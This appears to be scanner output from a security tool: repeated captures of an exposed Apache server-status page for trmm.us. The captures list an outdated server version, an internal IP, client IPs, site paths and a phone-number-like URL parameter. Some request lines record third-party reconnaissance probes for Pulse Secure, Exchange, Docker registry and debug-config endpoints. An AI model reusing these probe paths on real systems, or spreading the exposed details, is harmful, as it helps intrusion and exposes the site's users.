0-0100440/404/925_ 140.4514610.02.014.11 127.0.0.1http/1.1 1-01148460/176/690_ 47.0914210.02.386.81 127.0.0.1http/1.1 1-01148460/186/715_ 47.333700.01.373.62 170.187.138.207http/1.1 1-01148460/193/737_ 47.329910.05.027.80 173.239.218.219http/1.1 1-01148460/180/711_ 47.2126610.03.104.60 127.0.0.1http/1.1 1-01148460/191/717_ 47.193700.03.085.85 170.187.138.207http/1.1 1-01148460/183/710_ 47.3926610.03.316.98 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/180/699_ 47.48600.01.585.15 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 1-01148460/181/735_ 46.5525400.00.655.03 66.249.76.40http/1.1 1-01148460/186/720_ 47.326810.01.393.59 51.89.5.185http/1.1 1-01148460/199/690_ 47.4120610.00.632.22 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/176/696_ 46.4125410.03.215.20 66.249.74.106http/1.1 1-01148460/189/709_ 46.7525310.00.685.76 66.249.76.41http/1.1 1-01148460/198/732_ 46.7520610.02.296.35 127.0.0.1http/1.1 1-01148460/180/701_ 47.2425410.02.373.59 66.249.76.42http/1.1 1-01148460/201/720_ 47.4219110.00.484.06 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/186/697_ 47.456800.03.105.70 51.89.5.185http/1.1localhost:443POST / HTTP/1.1 1-01148460/187/714_ 47.2919110.03.086.81 127.0.0.1http/1.1 1-01148460/189/727_ 47.143710.02.515.11 170.187.138.207http/1.1 2-01276550/56/588_ 4.901510.00.054.70 159.65.79.72http/1.1 2-01276550/61/587_ 4.92810.00.123.48 127.0.0.1http/1.1 2-01276550/49/547_ 4.96810.00.042.76 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/57/571_ 4.97300.00.123.82 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 2-01276550/57/561_ 4.97700.00.125.89 170.187.152.119http/1.1localhost:443GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1 2-01276550/52/563_ 4.97200.00.068.66 168.143.243.26http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 2-01276550/57/546_ 4.97100.00.065.76 168.143.243.26http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 2-01276550/54/597_ 4.97200.00.062.34 168.143.243.26http/1.1trmm.us:443GET /about HTTP/1.1 2-01276550/54/576_ 4.97100.00.052.55 168.143.243.26http/1.1trmm.us:443GET /v2/_catalog HTTP/1.1 2-01276550/63/567_ 4.97000.00.072.28 168.143.243.26http/1.1trmm.us:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-01276550/53/544W 4.94000.00.052.20 168.143.243.26http/1.1trmm.us:443GET /server-status HTTP/1.1 2-01276550/57/579_ 4.955500.00.083.22 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=2657508562393 HT 2-01276550/52/562_ 4.856800.00.046.38 127.0.0.1http/1.1 2-01276550/56/553_ 4.855510.00.052.36 127.0.0.1http/1.1 2-01276550/60/544_ 4.962310.00.043.87 127.0.0.1http/1.1localhost:80GET /ser
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597ae39b964
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 24-Dec-2023 07:22:10 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 13 hours 33 minutes 49 seconds Server load: 0.08 0.02 0.01 Total accesses: 268915 - Total Traffic: 15.3 GB CPU Usage: u597.75 s106.34 cu0 cs0 - .0705% CPU load .269 requests/sec - 16.0 kB/second - 59.6 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no0yes018000 2127655no0yes018000 39765no1yes117010 4106151no0yes018000 5123272no0yes018000 619783no0yes018000 79491no0yes018000 85337no0yes018000 949846no0yes018000 Sum1001 1179010 _____________________________________________________________W__ ________________________________________________________________ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/428/955_ 140.4711100.07.2832.86 127.0.0.1http/1.1 0-0100440/422/952_ 141.645100.03.804.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2657508562171 HT 0-0100440/420/933_ 141.6114110.05.589.11 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/428/943_ 140.405100.06.847.82 127.0.0.1http/1.1 0-0100440/412/930_ 141.6210810.02.384.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/438/964_ 141.5630610.09.7211.53 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/406/913_ 140.3810800.02.863.93 127.0.0.1http/1.1 0-0100440/396/939_ 141.646610.02.453.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/392/897_ 140.396610.02.924.89 127.0.0.1http/1.1 0-0100440/423/964_ 141.6212610.05.567.47 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/389/919_ 140.4612610.06.618.13 127.0.0.1http/1.1 0-0100440/396/898_ 140.4133610.07.027.86 127.0.0.1http/1.1 0-0100440/399/919_ 140.4330610.05.176.03 127.0.0.1http/1.1 0-0100440/409/939_ 140.4427410.02.463.48 127.0.0.1http/1.1 0-0100440/436/952_ 141.5633610.02.223.36 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/428/952_ 141.5827410.05.927.56 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/435/946_ 141.6211100.08.629.89 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2657448504236 HT 0-0100440/404/925_ 140.4514110.02.014.11 127.0.0.1http/1.1 1-01148460/176/690_ 47.0913810.02.386.81 127.0.0.1http/1.1 1-01148460/186/715_ 47.333200.01.373.62 170.187.138.207http/1.1 1-01148460/193/737_ 47.329510.05.027.80 173.239.218.219http/1.1 1-01148460/180/711_ 47.2126110.03.104.60 127.0.0.1http/1.1 1-01148460/191/717_ 47.193200.03.085.85 170.187.138.207http/1.1 1-01148460/183/710_ 47.3926110.03.316.98 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/180/699_ 47.48200.01.585.15 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 1-01148460/181/735_ 46.5524900.00.655.03 66.249.76.40http/1.1 1-01148460/186/720_ 47.326410.01.393.59 51.89.5.185http/1.1 1-01148460/199/690_ 47.4120110.00.632.22 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/176/696_ 46.4124910.03.215.20 66.249.74.106http/1.1 1-01148460/189/709_ 46.7524810.00.685.76 66.249.76.41http/1.1 1-01148460/198/732_ 46.7520110.02.296.35 127.0.0.1http/1.1 1-01148460/180/701_ 47.2424910.02.373.59 66.249.76.42http/1.1 1-01148460/201/720_ 47.4218610.00.484.06 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/186/697_ 47.456400.03.105.70 51.89.5.185http/1.1localhost:443POST / HTTP/1.1 1-01148460/187/714_ 47.2918610.03.086.81 127.0.0.1http/1.1 1-01148460/189/727_ 47.143310.02.515.11 170.187.138.207http/1.1 2-01276550/56/588_ 4.901110.00.054.70 159.65.79.72http/1.1 2-01276550/61/587_ 4.92310.00.123.48 127.0.0.1http/1.1 2-01276550/49/547_ 4.96310.00.042.76 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/56/570_ 4.9212410.00.123.82 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/57/561_ 4.97300.00.125.89 170.187.152.119http/1.1localhost:443GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1 2-01276550/51/562_ 4.8812300.00.068.66 127.0.0.1http/1.1 2-01276550/56/545_ 4.7911100.00.065.76 127.0.0.1http/1.1 2-01276550/53/596_ 4.9211110.00.062.34 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/53/575_ 4.9211100.00.052.55 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=2657448504457 HT 2-01276550/62/566_ 4.8011110.00.062.28 127.0.0.1http/1.1 2-01276550/53/544_ 4.946310.00.052.20 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/57/579_ 4.955100.00.083.22 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=2657508562393 HT 2-01276550/52/562_ 4.856300.00.046.38 127.0.0.1http/1.1 2-01276550/56/553_ 4.855110.00.052.36 127.0.0.1http/1.1 2-01276550/60/544_ 4.961810.00.043.87 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/55/580_ 4.9533<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597e8c4b95e
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:05 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 44 seconds Server load: 1.22 0.81 0.33 Total accesses: 424 - Total Traffic: 7.0 MB CPU Usage: u4.01 s.48 cu0 cs0 - .447% CPU load .422 requests/sec - 7.2 kB/second - 17.0 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no3yes018030 6106024no1yes018010 7106043no0yes117000 8106065no3yes117030 9107415no0yes018000 Sum1008 2178080 ________________________________________________________________ ________________________________________________________________ _________W_______W__________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016790.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516300.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516310.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059200.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15000.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.1646400.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658871390636 HT 0-01059290/2/2_ 0.1745210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934300.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825300.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322300.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922300.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516710.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05821620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058202170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257600.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19364110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613180.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03080.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04090.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06010.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.1451210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.1837710.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.1837010.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2222010.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2611510.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/1/1_ 0.0040500.00.070.07 172.200.177.144http/1.1 3-01059500/2/2_ 0.1840490.00.000.00 96.7.74.198http/1.1crm.sprout.online:443HEAD /login.php HTTP/1.1 3-01059500/1/1_ 0.1838580.00.010.01 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 3-01059500/2/2_ 0.2036210.00.010.01 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/1/1_ 0.0236200.00.070.07 127.0.0.1http/1.1 3-01059500/1/1_ 0.2322980.00.010.01 104.28.85.94http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 3-01059500/2/2_ 0.25184810.00.010.01 107.119.41.40http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 3-01059500/1/1_ 0.0810480.00.000.00 23.205.108.74http/1.1 3-01059500/2/2_ 0.288510.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/2/2_ 0.302000.00.000.00 159.89.118.137http/1.1hi5rr.com:80HEAD / HTTP/1.1 3-01059500/2/2_ 0.32000.00.080.08 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /about HTTP/1.1 3-01059500/1/1_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 3-01059500/1/1_ 0.18080.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.15http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/1/1_ 0.20000.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.2135600.00.000.00 99.32.168.66http/1.1veew.info:443GET /images/apple-icon.png HTTP/1.1 4-01059730/2/2_ 0.2135590.00.070.07
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597bde4472d
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:05 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 44 seconds Server load: 1.22 0.81 0.33 Total accesses: 425 - Total Traffic: 7.0 MB CPU Usage: u4.02 s.49 cu0 cs0 - .449% CPU load .423 requests/sec - 7.2 kB/second - 17.0 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no3yes018030 6106024no1yes018010 7106043no1yes117000 8106065no3yes117030 9107415no0yes018000 Sum1009 2178080 ________________________________________________________________ ________________________________________________________________ _________W_____________W____________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016790.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516300.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516310.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059200.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15000.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.1646400.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658871390636 HT 0-01059290/2/2_ 0.1745210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934400.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825300.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322300.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922300.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516710.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05821620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058212170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257600.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19365110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613180.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03080.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04090.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06010.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.1451210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.1837710.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.1837010.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2222010.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/1/1_ 0.2611510.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/1/1_ 0.0040500.00.070.07 172.200.177.144http/1.1 3-01059500/2/2_ 0.1840490.00.000.00 96.7.74.198http/1.1crm.sprout.online:443HEAD /login.php HTTP/1.1 3-01059500/1/1_ 0.1838580.00.010.01 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 3-01059500/2/2_ 0.2036210.00.010.01 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/1/1_ 0.0236200.00.070.07 127.0.0.1http/1.1 3-01059500/1/1_ 0.2322980.00.010.01 104.28.85.94http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 3-01059500/2/2_ 0.25184810.00.010.01 107.119.41.40http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 3-01059500/1/1_ 0.0810480.00.000.00 23.205.108.74http/1.1 3-01059500/2/2_ 0.288510.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/2/2_ 0.302000.00.000.00 159.89.118.137http/1.1hi5rr.com:80HEAD / HTTP/1.1 3-01059500/2/2_ 0.32000.00.080.08 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 3-01059500/2/2_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /about HTTP/1.1 3-01059500/1/1_ 0.32000.00.000.00 168.143.243.26http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 3-01059500/1/1_ 0.18080.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.15http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/1/1_ 0.20000.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.2135600.00.000.00 99.32.168.66http/1.1veew.info:443GET /images/apple-icon.png HTTP/1.1 4-01059730/2/2_ 0.2135590.00.070.07
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5972162e571
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:29 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 45 seconds Server load: 0.33 0.27 0.15 Total accesses: 863211 - Total Traffic: 13.4 GB CPU Usage: u768.76 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 4 requests currently being processed, 176 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no10yes315061 421293no1yes018010 582938no2yes018020 6113967no0yes018000 794980no1yes018010 9107391no0yes018000 11114344no1yes117000 Sum10015 41760101 ______________________________________________________W_________ _W___W__________________________________________________________ ________________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00200.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0528210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.235180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00200.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0626130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.755160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0951230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017200.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1141220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9841290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1041190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8967160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98400.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017240.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0438140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00160.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932774480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.761140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.761150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7611650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61100.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.761150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.30http/1.1 1-095220/210/2816_ 21.71120.01.4037.52 168.143.243.26http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.30http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.30http/1.1 1-095220/203/2809_ 21.62100.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.761140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98410.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9751220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99260.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89221910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.984330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.901750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51500.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.661780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90120.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51500.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.910140.03.9424.64 168.143.243.30http/1.1 2-01220760/384/3025_ 42.95520.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.975320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.910160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.900150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061722350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98240.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069_ </
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597e3f93805
